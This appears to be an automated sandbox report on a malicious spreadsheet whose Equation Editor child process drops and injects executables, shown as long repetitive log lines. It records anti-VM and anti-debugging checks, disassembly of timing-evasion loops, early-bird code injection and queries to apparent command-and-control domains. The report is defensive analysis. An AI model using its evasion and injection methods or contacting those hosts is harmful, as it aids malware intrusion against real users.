Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process information set: NOOPENFILEERRORBOX

Document contains OLE streams with high entropy indicating encrypted embedded content

Source: Required Order Quantity.xlsx

Stream path 'EncryptedPackage' entropy: 7.99991075725 (max. 8.0)

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D872E second address: 00000000003D87E6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c cmp bh, bh 0x0000000e mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000018 test dx, dx 0x0000001b test eax, edx 0x0000001d call 00007FEA5874D793h 0x00000022 call 00007FEA5874D718h 0x00000027 lfence 0x0000002a mov edx, dword ptr [7FFE0014h] 0x00000030 lfence 0x00000033 ret 0x00000034 mov esi, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D87E6 second address: 00000000003D87E6 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FEA5877F4D8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007FEA5877F4FEh 0x0000001f cmp bl, 0000006Dh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007FEA5877F489h 0x00000033 test eax, edx 0x00000035 call 00007FEA5877F563h 0x0000003a call 00007FEA5877F4E8h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D0C26 second address: 00000000003D0C26 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D3F33 second address: 00000000003D3F33 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D3FF5 second address: 00000000003D3FF5 instructions:

Tries to detect Any.run

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D872E second address: 00000000003D87E6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c cmp bh, bh 0x0000000e mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000018 test dx, dx 0x0000001b test eax, edx 0x0000001d call 00007FEA5874D793h 0x00000022 call 00007FEA5874D718h 0x00000027 lfence 0x0000002a mov edx, dword ptr [7FFE0014h] 0x00000030 lfence 0x00000033 ret 0x00000034 mov esi, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D87E6 second address: 00000000003D87E6 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FEA5877F4D8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007FEA5877F4FEh 0x0000001f cmp bl, 0000006Dh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007FEA5877F489h 0x00000033 test eax, edx 0x00000035 call 00007FEA5877F563h 0x0000003a call 00007FEA5877F4E8h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D8806 second address: 00000000003D8806 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FEA5874DF0Ch 0x0000001d popad 0x0000001e call 00007FEA5874D886h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D0C26 second address: 00000000003D0C26 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D5908 second address: 00000000003D4BD7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test cx, cx 0x0000000e ret 0x0000000f jmp 00007FEA5874D72Eh 0x00000011 cmp cx, bx 0x00000014 call 00007FEA58750AB3h 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f mov eax, dword ptr [eax+10h] 0x00000022 add eax, 40h 0x00000025 add eax, 04h 0x00000028 mov eax, dword ptr [eax] 0x0000002a ret 0x0000002b mov dword ptr [ebp+4Ch], eax 0x0000002e cmp ebx, ecx 0x00000030 call 00007FEA587511BCh 0x00000035 push dword ptr [ebp+20h] 0x00000038 pop dword ptr [ebp+0000012Ch] 0x0000003e mov dword ptr [ebp+68h], 00000000h 0x00000045 jmp 00007FEA5874EA30h 0x0000004a call 00007FEA5874C409h 0x0000004f jmp 00007FEA5874D732h 0x00000051 pushad 0x00000052 mov edi, 00000036h 0x00000057 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003DA4D8 second address: 00000000003DA4D8 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edx, dword ptr [ebp+44h] 0x00000006 jne 00007FEA5877F455h 0x00000008 jmp 00007FEA5877F4FEh 0x0000000a test edi, 9279C6F4h 0x00000010 sub edx, 04h 0x00000013 xor dword ptr [edx], ecx 0x00000015 jmp 00007FEA5877F506h 0x00000017 pushad 0x00000018 mov edx, 000000C6h 0x0000001d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D3F33 second address: 00000000003D3F33 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003D3FF5 second address: 00000000003D3FF5 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000001B8806 second address: 00000000001B8806 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FEA5874DF0Ch 0x0000001d popad 0x0000001e call 00007FEA5874D886h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000001B5908 second address: 00000000001B4BD7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test cx, cx 0x0000000e ret 0x0000000f jmp 00007FEA5877F4FEh 0x00000011 cmp cx, bx 0x00000014 call 00007FEA58782883h 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f mov eax, dword ptr [eax+10h] 0x00000022 add eax, 40h 0x00000025 add eax, 04h 0x00000028 mov eax, dword ptr [eax] 0x0000002a ret 0x0000002b mov dword ptr [ebp+4Ch], eax 0x0000002e cmp ebx, ecx 0x00000030 call 00007FEA58782F8Ch 0x00000035 push dword ptr [ebp+20h] 0x00000038 pop dword ptr [ebp+0000012Ch] 0x0000003e mov dword ptr [ebp+68h], 00000000h 0x00000045 jmp 00007FEA58780800h 0x0000004a call 00007FEA5877E1D9h 0x0000004f jmp 00007FEA5877F502h 0x00000051 pushad 0x00000052 mov edi, 00000036h 0x00000057 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000001BA4D8 second address: 00000000001BA4D8 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edx, dword ptr [ebp+44h] 0x00000006 jne 00007FEA5874D685h 0x00000008 jmp 00007FEA5874D72Eh 0x0000000a test edi, 9279C6F4h 0x00000010 sub edx, 04h 0x00000013 xor dword ptr [edx], ecx 0x00000015 jmp 00007FEA5874D736h 0x00000017 pushad 0x00000018 mov edx, 000000C6h 0x0000001d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 5_2_003D0DDA rdtsc

5_2_003D0DDA

Found dropped PE file which has not been started or loaded

Source: C:\Windows\system\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\mrsys.exe			Jump to dropped file
Source: C:\Windows\system\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\stsys.exe			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2904	Thread sleep time: -360000s >= -30000s			Jump to behavior
Source: C:\Windows\system\explorer.exe TID: 1688	Thread sleep count: 55 > 30			Jump to behavior
Source: C:\Windows\system\explorer.exe TID: 2828	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Windows\system\svchost.exe TID: 2112	Thread sleep time: -1260000s >= -30000s			Jump to behavior
Source: C:\Windows\system\svchost.exe TID: 620	Thread sleep count: 97 > 30			Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2840	Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2064	Thread sleep time: -120000s >= -30000s

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: spoolsv.exe, 00000009.00000003.2182541924.00000000005DC000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Queries a list of all running processes

Source: C:\Users\user\AppData\Local\icsys.icn.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process queried: DebugPort
Source: C:\Users\Public\vbc.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 5_2_003D0DDA rdtsc

5_2_003D0DDA

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 18_2_1EB1FEA0 NtReadVirtualMemory,LdrInitializeThunk,

18_2_1EB1FEA0

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D906B mov eax, dword ptr fs:[00000030h]		5_2_003D906B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D7EE5 mov eax, dword ptr fs:[00000030h]		5_2_003D7EE5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D4443 mov eax, dword ptr fs:[00000030h]		5_2_003D4443
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D90B7 mov eax, dword ptr fs:[00000030h]		5_2_003D90B7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D90AB mov eax, dword ptr fs:[00000030h]		5_2_003D90AB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D6C83 mov eax, dword ptr fs:[00000030h]		5_2_003D6C83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D90F7 mov eax, dword ptr fs:[00000030h]		5_2_003D90F7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D9137 mov eax, dword ptr fs:[00000030h]		5_2_003D9137
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3168 mov eax, dword ptr fs:[00000030h]		5_2_003D3168
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3166 mov eax, dword ptr fs:[00000030h]		5_2_003D3166
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D31AF mov eax, dword ptr fs:[00000030h]		5_2_003D31AF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D2E3F mov eax, dword ptr fs:[00000030h]		5_2_003D2E3F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D2651 mov eax, dword ptr fs:[00000030h]		5_2_003D2651
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D7F4B mov eax, dword ptr fs:[00000030h]		5_2_003D7F4B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB326F8 mov eax, dword ptr fs:[00000030h]		18_2_1EB326F8
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B906B mov eax, dword ptr fs:[00000030h]		18_2_001B906B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B90B7 mov eax, dword ptr fs:[00000030h]		18_2_001B90B7
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B90AB mov eax, dword ptr fs:[00000030h]		18_2_001B90AB
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B90F7 mov eax, dword ptr fs:[00000030h]		18_2_001B90F7
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9137 mov eax, dword ptr fs:[00000030h]		18_2_001B9137
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B4413 mov eax, dword ptr fs:[00000030h]		18_2_001B4413
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B4415 mov eax, dword ptr fs:[00000030h]		18_2_001B4415
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B6C83 mov eax, dword ptr fs:[00000030h]		18_2_001B6C83
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B7EE5 mov eax, dword ptr fs:[00000030h]		18_2_001B7EE5
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B7F4B mov eax, dword ptr fs:[00000030h]		18_2_001B7F4B

Enables debug privileges

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Early bird code injection technique detected

Source: C:\Users\user\AppData\Local\icsys.icn.exe

Process created / APC Queued / Resumed: C:\Windows\system\explorer.exe

Jump to behavior

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\system\explorer.exe	Domain query: vccmd01.googlecode.com
Source: C:\Windows\system\explorer.exe	Domain query: vccmd02.googlecode.com
Source: C:\Windows\system\explorer.exe	Network Connect: 74.125.143.82 80			Jump to behavior
Source: C:\Windows\system\explorer.exe	Domain query: vccmd01.zxq.net
Source: C:\Windows\system\explorer.exe	Domain query: vccmd03.googlecode.com
Source: C:\Windows\system\explorer.exe	Domain query: vccmd01.t35.com

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\system\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread register set: target process: 1388

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\system\explorer.exe c:\windows\system\explorer.exe			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe SE			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process created: C:\Windows\system\svchost.exe c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe PR			Jump to behavior
